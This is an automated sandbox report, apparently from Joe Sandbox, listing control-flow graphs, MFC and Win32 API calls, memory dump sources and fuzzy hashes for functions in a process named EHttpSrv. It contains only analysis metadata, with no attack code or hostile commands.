                                                                                                                control_flow_graph 256 20404410-2040442c 258 20404436-2040443e 256->258 258->258 259 20404440 258->259 260 20404446-2040444e 259->260 260->260 261 20404450-20404465 call 204045f6 260->261 265 20404485-204044cc LoadLibraryW call 20404626 261->265 266 20404467-20404469 261->266 267 20404476-20404483 266->267 267->265 267->267
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 20404486
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 28c0e0c1c0e0989bdf65198ffae234c81b4255d7b9b0891e5899f52016e814b7
                                                                                                                • Instruction ID: 97bcd7a7d3ee4d16da48454221c5b769e84301d7cc6fa58145fe6bcf158dcb16
                                                                                                                • Opcode Fuzzy Hash: 28c0e0c1c0e0989bdf65198ffae234c81b4255d7b9b0891e5899f52016e814b7
                                                                                                                • Instruction Fuzzy Hash: 6011A0B16053019FD354CF24C485F2AB3FABF98314F85C56CE589A7351E7B8A905CB52
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4026$#896$#776$#899$#5869$#2311$#310#900MessageSend
                                                                                                                • String ID: $ - $ / $%d - %d$%s (%d)$ID: %X$xXH $xXH $xXH $xXH $xXH $xXH $xXH $xXH $xXH
                                                                                                                • API String ID: 37426512-947018009
                                                                                                                • Opcode ID: cabc2dbee85e4aba3fd63b2958040dc1ad44c8bd5ea43a03926384743e42d822
                                                                                                                • Instruction ID: a5ad9d8399a16f30ac34dc57339c248370c21395f96e8a4d18e51e0fa3845928
                                                                                                                • Opcode Fuzzy Hash: cabc2dbee85e4aba3fd63b2958040dc1ad44c8bd5ea43a03926384743e42d822
                                                                                                                • Instruction Fuzzy Hash: 46D26AB15087429FC314DF94CC94B9AB7E4FF98709F008D2DF58693291EB78A949CB92

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 603 20413950-20413a52 #310 * 2 call 20420ae0 #777 * 2 #4026 #896 #900 call 20420a10 #777 * 2 608 20413a54-20413a64 #4026 603->608 609 20413a66-20413a71 #776 603->609 610 20413a72-20413a81 #896 608->610 609->610 611 20413ab0-20413b2f #5869 #777 * 2 #4026 call 20420a10 #4026 #896 #900 610->611 612 20413a83-20413aaa #900 #4026 #896 610->612 615 20413b31-20413b36 611->615 616 20413b38-20413b3b 611->616 612->611 617 20413b73-20413b81 #4026 615->617 618 20413b53-20413b56 616->618 619 20413b3d-20413b51 #4026 616->619 620 20413b82-20413bcd #896 #900 #4026 #896 #900 617->620 621 20413b58-20413b6c #4026 618->621 622 20413b6e 618->622 619->620 623 20413bd6-20413bd9 620->623 624 20413bcf-20413bd4 620->624 621->620 622->617 626 20413bf1-20413bf4 623->626 627 20413bdb-20413bef #4026 623->627 625 20413c11-20413c1f #4026 624->625 628 20413c20-20413c30 #896 625->628 629 20413bf6-20413c0a #4026 626->629 630 20413c0c 626->630 627->628 631 20413c32-20413c34 628->631 632 20413c96-20413cd8 #900 #4026 #896 #900 628->632 629->628 630->625 633 20413c63-20413c67 631->633 634 20413c36-20413c5d #900 #4026 #896 631->634 635 20413cf0-20413cf7 call 20410b40 632->635 636 20413cda-20413cee #4026 632->636 633->632 639 20413c69-20413c90 #900 #4026 #896 633->639 634->633 642 20413cf9-20413d0d #4026 635->642 643 20413d0f-20413d23 call 20410b40 #776 635->643 637 20413d24-20413daf #896 #5869 #777 * 2 #4026 call 20420a10 636->637 646 20413db1-20413dcd #4026 #896 637->646 647 20413dd2-20413e1e #4026 #896 #900 637->647 639->632 642->637 643->637 649 204143de-2041443d #5869 #777 * 2 #4026 646->649 650 20413e20-20413e38 #4026 #896 647->650 651 20413e3e-20413e45 647->651 652 20414440-20414449 649->652 650->651 653 20413ec0-20413ec5 651->653 654 20413e47 651->654 652->652 655 2041444b-2041447b call 204207a0 652->655 656 20413f35-20413f3c 653->656 657 20413ec7 653->657 658 20413e4d-20413e4f 654->658 675 2041447d-20414483 655->675 676 2041449e-204144d9 #4026 #896 #900 655->676 663 20413fa5-20413faf 656->663 664 20413f3e 656->664 662 20413ed0-20413f33 call 20417ed0 #899 #900 #899 #900 657->662 659 20413e55-20413e58 658->659 660 204141bd #1176 658->660 659->660 665 20413e5e-20413e91 _snwprintf_s 659->665 669 204141c2-204141e8 #776 call 2041c400 660->669 662->656 670 20413fb5 663->670 671 20414038-20414040 663->671 668 20413f40-20413fa3 call 20417f90 #899 #900 #899 #900 664->668 665->660 672 20413e97-20413ebe #899 #900 665->672 668->663 698 20414215-2041423c #896 #900 669->698 680 20413fb7-20413fb9 670->680 673 20414046 671->673 674 20414119-20414121 671->674 672->653 672->658 682 20414048-2041404a 673->682 688 20414127-20414133 674->688 689 20414248-2041427d #5869 674->689 675->676 683 20414485-20414499 #4026 675->683 684 204144f9-20414501 676->684 685 204144db-204144f3 #4026 #896 676->685 680->660 681 20413fbf-20413fc5 680->681 681->660 692 20413fcb-20414034 call 20406540 #899 #900 681->692 682->660 694 20414050-20414056 682->694 695 204146b4-20414703 #896 #5869 SendMessageW #2362 #2788 SendMessageW 683->695 696 20414503-20414505 684->696 697 20414554-2041455c 684->697 685->684 690 20414139-2041413d 688->690 691 204141ea-204141ec 688->691 693 20414280-20414289 689->693 690->691 701 20414143-20414145 690->701 691->660 709 204141ee-204141f4 691->709 692->680 723 20414036 692->723 693->693 704 2041428b-20414300 call 204207a0 #777 * 2 #4026 #896 #900 693->704 694->660 705 2041405c-204140a5 call 20406540 694->705 706 20414705-20414707 695->706 707 20414767-20414769 695->707 696->660 708 2041450b-20414511 696->708 699 204145d7-2041460d #5869 697->699 700 2041455e 697->700 698->688 703 20414242-20414246 698->703 716 20414610-20414619 699->716 711 20414560-20414562 700->711 701->660 712 20414147-2041414d 701->712 703->689 735 20414320-20414325 704->735 736 20414302-2041431a #4026 #896 704->736 705->660 737 204140ab-20414111 #2311 #896 705->737 706->660 719 2041470d-20414713 706->719 714 2041476b-2041476d 707->714 715 2041476f 707->715 708->660 720 20414517-20414552 #2311 #896 708->720 709->660 710 204141f6-20414212 #2311 709->710 710->698 711->660 721 20414568-2041456e 711->721 712->660 722 2041414f-2041417f call 2041ecd0 712->722 724 20414772-204147cb SendMessageW #578 * 2 call 20478952 714->724 715->724 716->716 725 2041461b-20414694 call 204207a0 #777 * 2 #4026 #896 #900 716->725 719->660 728 20414719-20414729 719->728 720->696 720->697 721->660 731 20414574-20414590 721->731 722->669 745 20414181-20414187 722->745 723->671 746 20414696-204146a6 #4026 725->746 747 204146a8-204146b3 #776 725->747 729 2041472b 728->729 730 2041472e-20414765 SendMessageW * 2 #2788 SendMessageW 728->730 729->730 730->706 730->707 731->660 738 20414596-204145d5 #2311 #896 731->738 742 20414327-20414329 735->742 743 2041436f-20414374 735->743 736->735 737->682 744 20414117 737->744 738->699 738->711 742->660 748 2041432f-20414332 742->748 743->649 749 20414376-20414378 743->749 744->674 745->660 750 20414189-204141bb #2311 call 2041c400 745->750 746->695 747->695 748->660 751 20414338-2041436d #2311 #896 748->751 749->660 752 2041437e-20414381 749->752 750->698 751->742 751->743 752->660 753 20414387-2041439d 752->753 753->660 755 204143a3-204143dc #2311 #896 753->755 755->649 755->749
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4026$#896$#900$#777$#5869#899$#310#776MessageSend$_snwprintf_s
                                                                                                                • String ID: $ - $ / $%d - %d; $%d.%d.%d.%d$%d; $%ls / %d;$xXH $xXH
                                                                                                                • API String ID: 2650775939-1412730413
                                                                                                                • Opcode ID: e3b0b1cbae6526f139b746ec2c712949ead39f22e1a82209597108467d04682c
                                                                                                                • Instruction ID: 169cefda1df22826ce657370b19dc22772120cb55ed47d989d93c792faa39f45
                                                                                                                • Opcode Fuzzy Hash: e3b0b1cbae6526f139b746ec2c712949ead39f22e1a82209597108467d04682c
                                                                                                                • Instruction Fuzzy Hash: 03926B721083419FC714DF94CC88B9EB7F5BB98709F40C92DF586972A1EB38A649CB52

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 908 204276c0-20427713 #4574 909 20427715-2042771c 908->909 910 20427748-20427750 #2155 908->910 909->910 911 2042771e 909->911 912 20427755-20427763 910->912 913 20427720-20427722 911->913 914 20427771-204277a2 912->914 915 20427765-2042776c #2155 912->915 918 20427728-2042772a 913->918 919 20427c59 913->919 916 204277b0-204277df call 2042fa70 * 2 914->916 917 204277a4-204277ab #2155 914->917 915->914 931 204277e1-204277ec 916->931 932 20427805-2042780c 916->932 917->916 918->919 921 20427730-20427739 918->921 924 20427c60 919->924 921->912 923 2042773b-20427746 921->923 923->910 923->913 926 20427c64-20427c6c 924->926 928 20427cd1-20427cd3 926->928 929 20427c6e-20427c70 926->929 928->919 930 20427cd5-20427cdb 928->930 929->919 933 20427c72-20427c78 929->933 930->919 934 20427ce1-20427d01 #2311 930->934 935 204277f7-204277ff InvalidateRect 931->935 936 204277ee-204277f2 call 2042faf0 931->936 937 20427812-2042783e #310 932->937 938 20427f85-20427fad call 20478952 932->938 933->919 939 20427c7a-20427ccf call 2041ecd0 #2311 call 2041c400 933->939 941 20427d04-20427d43 SendMessageW * 2 934->941 935->932 936->935 943 20427844-2042784a 937->943 944 20427909-2042791b 937->944 939->941 941->924 950 20427d49-20427d5a 941->950 943->919 951 20427850-20427857 943->951 948 20427921-204279a1 call 20417ed0 #2310 SendMessageW * 2 944->948 949 204279a7-204279ba 944->949 948->949 954 204279c0-20427a40 call 20417f90 #2310 SendMessageW * 2 949->954 955 20427a46-20427a5a 949->955 956 20427dd7-20427de6 950->956 957 20427d5c 950->957 951->919 958 2042785d-204278a2 _snwprintf_s 951->958 954->955 962 20427b20-20427b32 955->962 963 20427a60 955->963 965 20427e87-20427e9b SendMessageW 956->965 966 20427dec 956->966 964 20427d64-20427d66 957->964 958->919 967 204278a8-20427903 #2310 SendMessageW * 2 958->967 968 20427b38 962->968 969 20427c3f-20427c51 962->969 974 20427a64-20427a69 963->974 964->919 975 20427d6c-20427d6f 964->975 971 20427eaf-20427ec3 SendMessageW 965->971 972 20427e9d-20427ead SendMessageW 965->972 970 20427df4-20427df6 966->970 967->943 967->944 976 20427b3c-20427b41 968->976 969->950 978 20427c57 969->978 970->919 977 20427dfc-20427dff 970->977 979 20427ed7-20427eea 971->979 980 20427ec5-20427ed5 SendMessageW 971->980 972->971 974->919 981 20427a6f-20427a79 974->981 975->919 982 20427d75-20427dd5 #2310 SendMessageW * 2 975->982 976->919 983 20427b47-20427b51 976->983 977->919 984 20427e05-20427e1b 977->984 978->926 985 20427f70-20427f7f #578 979->985 986 20427ef0-20427f06 979->986 980->979 981->919 987 20427a7f-20427b1a call 20406540 #2310 SendMessageW * 2 981->987 982->956 988 20427d60 982->988 983->919 989 20427b57-20427baa call 20406540 983->989 984->919 990 20427e21-20427e81 #2310 SendMessageW * 2 984->990 985->938 986->985 991 20427f08-20427f17 986->991 987->962 987->974 988->964 989->919 998 20427bb0-20427c39 #2310 SendMessageW * 2 989->998 990->965 994 20427df0 990->994 991->919 995 20427f1d-20427f6a #280 #899 #6063 InvalidateRect #578 991->995 994->970 995->985 998->969 998->976
                                                                                                                APIs
                                                                                                                • #4574.MFC80U(FEEA6C22), ref: 20427706
                                                                                                                • #2155.MFC80U(00000000,FEEA6C22), ref: 20427750
                                                                                                                • #2155.MFC80U(?,00000000,FEEA6C22), ref: 2042776C
                                                                                                                • #2155.MFC80U(?,00000000,FEEA6C22), ref: 204277AB
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 204277FF
                                                                                                                • #310.MFC80U(000001C4,000001C6,000001C3,000001C5,00000000,FEEA6C22), ref: 20427816
                                                                                                                • _snwprintf_s.MSVCR80 ref: 2042788E
                                                                                                                • #2310.MFC80U(?,000000F7,?), ref: 204278BA
                                                                                                                • SendMessageW.USER32(?,00000181,00000000,?), ref: 204278D5
                                                                                                                • SendMessageW.USER32(?,0000019A,00000000,00000000), ref: 204278E6
                                                                                                                • #2310.MFC80U(?,000000F8,?,?,?,?), ref: 20427958
                                                                                                                • SendMessageW.USER32(?,00000181,00000000,?), ref: 20427977
                                                                                                                • SendMessageW.USER32(?,0000019A,00000000,00000001), ref: 20427988
                                                                                                                • #2310.MFC80U(?,000000F9,?,?,?,?), ref: 204279F7
                                                                                                                • SendMessageW.USER32(?,00000181,00000000,?), ref: 20427A16
                                                                                                                • SendMessageW.USER32(?,0000019A,00000000,00000002), ref: 20427A27
                                                                                                                • #2310.MFC80U(00000000,000001AB,?,?,?), ref: 20427ACD
                                                                                                                • SendMessageW.USER32(?,00000181,00000000,?), ref: 20427AE8
                                                                                                                • SendMessageW.USER32(?,0000019A,00000000,00000003), ref: 20427AF9
                                                                                                                • #2310.MFC80U(?,000001B5,?,?,?,?), ref: 20427BEC
                                                                                                                • SendMessageW.USER32(?,00000181,00000000,?), ref: 20427C07
                                                                                                                • SendMessageW.USER32(?,0000019A,00000000,00000004), ref: 20427C18
                                                                                                                • #2311.MFC80U(?,2048A5C0,?), ref: 20427CAF
                                                                                                                • SendMessageW.USER32(?,00000181,00000000,?), ref: 20427D16
                                                                                                                • SendMessageW.USER32(?,0000019A,00000000,00000005), ref: 20427D27
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#2310$#2155$#2311#310#4574InvalidateRect_snwprintf_s
                                                                                                                • String ID: $%d.%d.%d.%d
                                                                                                                • API String ID: 3043057548-2915810652
                                                                                                                • Opcode ID: 6da49143dbddd625081548b6f17276a95ca0a4c8e12fae0d74d201b9092ad2c1
                                                                                                                • Instruction ID: 3481f979ec22c93b63359bec9ef62fccf64b0c2134cbc51f481e68d95ae59acf
                                                                                                                • Opcode Fuzzy Hash: 6da49143dbddd625081548b6f17276a95ca0a4c8e12fae0d74d201b9092ad2c1
                                                                                                                • Instruction Fuzzy Hash: 5F428A70208742AFD318CF64C895FAAB7E5BF88704F048A6DF59997391DB34E904CB92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20420040: #764.MFC80U(?,?,?,20462BF8,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000), ref: 20420074
                                                                                                                  • Part of subcall function 2041B640: #764.MFC80U(?,?,?,20462C00,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000), ref: 2041B674
                                                                                                                  • Part of subcall function 20412B10: #1176.MFC80U(FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89), ref: 20412B3D
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B64
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B74
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B84
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B94
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BAD
                                                                                                                  • Part of subcall function 2040F390: #764.MFC80U(?,?,00000000,?,20462C12,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?), ref: 2040F3AF
                                                                                                                  • Part of subcall function 2040F390: #764.MFC80U(?,00000000,?,20462C12,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?), ref: 2040F3C7
                                                                                                                  • Part of subcall function 20412B10: #265.MFC80U(00000000,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BF3
                                                                                                                  • Part of subcall function 20412B10: memset.MSVCR80 ref: 20412C00
                                                                                                                  • Part of subcall function 2040FCE0: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD2D
                                                                                                                  • Part of subcall function 2040FCE0: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD3D
                                                                                                                  • Part of subcall function 2040FCE0: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD51
                                                                                                                • #280.MFC80U(?,?,00000001,00000000,00000000), ref: 20462E3B
                                                                                                                  • Part of subcall function 20462BC0: #2461.MFC80U(00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000,?,?), ref: 20462C27
                                                                                                                  • Part of subcall function 20462BC0: #578.MFC80U ref: 20462C6E
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,00000001,00000000,00000000), ref: 20462F5E
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,00000001,00000000,00000000), ref: 20462F72
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,00000001,00000000,00000000), ref: 20462F86
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,00000001,00000000,00000000), ref: 20462F9A
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 20462FE8
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 20462FF9
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 2046300A
                                                                                                                  • Part of subcall function 20412B10: memset.MSVCR80 ref: 20412C7E
                                                                                                                  • Part of subcall function 2040FCE0: #265.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD8F
                                                                                                                  • Part of subcall function 2040FCE0: memset.MSVCR80 ref: 2040FD9C
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 2046301E
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 204630D6
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 204630E7
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 204630F8
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 20463109
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 20463122
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 20463133
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 20463144
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 20463155
                                                                                                                • #1176.MFC80U(?,?,00000001,00000000,00000000), ref: 2046321A
                                                                                                                • #620.MFC80U(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000,?,?), ref: 2046363C
                                                                                                                • #620.MFC80U(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000,?,?), ref: 20463650
                                                                                                                • #605.MFC80U(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000,?,?), ref: 20463663
                                                                                                                • #620.MFC80U(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000,?,?), ref: 204636E1
                                                                                                                • #620.MFC80U(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000,?,?), ref: 204636F5
                                                                                                                • #605.MFC80U(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000,?,?), ref: 20463708
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$#620$memset$#1176#265#605$#2461#280#578
                                                                                                                • String ID:
                                                                                                                • API String ID: 3532419128-0
                                                                                                                • Opcode ID: f6923c6f791e5853eaf6ab76b2eefd295e5d6ffe9b49acd0faa6d025e7341149
                                                                                                                • Instruction ID: 960057be93a2f085ab90d871999a437e563e96a6fd75a6c40616e5d940da2715
                                                                                                                • Opcode Fuzzy Hash: f6923c6f791e5853eaf6ab76b2eefd295e5d6ffe9b49acd0faa6d025e7341149
                                                                                                                • Instruction Fuzzy Hash: 2D72FFB15083818BC731CF94C8C1BCFB3E5AF94709F04C95DE99997251EB78AA49CB92
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041C9D0
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041C9E0
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041C9F0
                                                                                                                • #764.MFC80U(00000000,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA09
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA22
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA3B
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA57
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA70
                                                                                                                • qsort.MSVCR80 ref: 2041CAA0
                                                                                                                • qsort.MSVCR80 ref: 2041CAE0
                                                                                                                • qsort.MSVCR80 ref: 2041CB0A
                                                                                                                • qsort.MSVCR80 ref: 2041CB34
                                                                                                                • qsort.MSVCR80 ref: 2041CB75
                                                                                                                • #265.MFC80U(00000000,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CBB3
                                                                                                                • #265.MFC80U(00000000,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CC14
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$qsort$#265
                                                                                                                • String ID:
                                                                                                                • API String ID: 1244314208-0
                                                                                                                • Opcode ID: 7c709b07dfba37b4dc4c9307eebcb5279ea5313f7d186075e51f952b3fc88257
                                                                                                                • Instruction ID: ecd76e829027cae471c9e580738ce7b99bde1b95d902c318f8ba6eef2ec4f2fd
                                                                                                                • Opcode Fuzzy Hash: 7c709b07dfba37b4dc4c9307eebcb5279ea5313f7d186075e51f952b3fc88257
                                                                                                                • Instruction Fuzzy Hash: 2BB190B16002059BCB14DFA8CC82A9AB7A1FF48304B94C52DF91997751D739FE85DBC0
                                                                                                                APIs
                                                                                                                • GetFocus.USER32 ref: 20433624
                                                                                                                • #2366.MFC80U(00000000), ref: 2043362B
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 2043363C
